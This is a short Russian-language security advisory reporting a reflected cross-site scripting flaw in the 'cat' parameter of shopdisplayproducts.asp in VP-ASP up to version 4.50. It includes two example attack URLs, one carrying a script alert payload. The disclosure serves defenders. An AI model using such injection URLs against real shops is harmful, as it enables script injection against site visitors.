Программа: VP-ASP до версии 4.50
Уязвимость в проверке правильности входных данных обнаружена в VP-ASP в 'shopdisplayproducts.asp' сценарии. Удаленный пользователь может выполнить XSS нападение.
Пример:
http://[target]/shopping/shopdisplayproducts.asp?id=1 &cat=[XSS Code]
http://[target]/shopping/shopdisplayproducts.asp?id=1 &cat=<script>alert('test')</script>
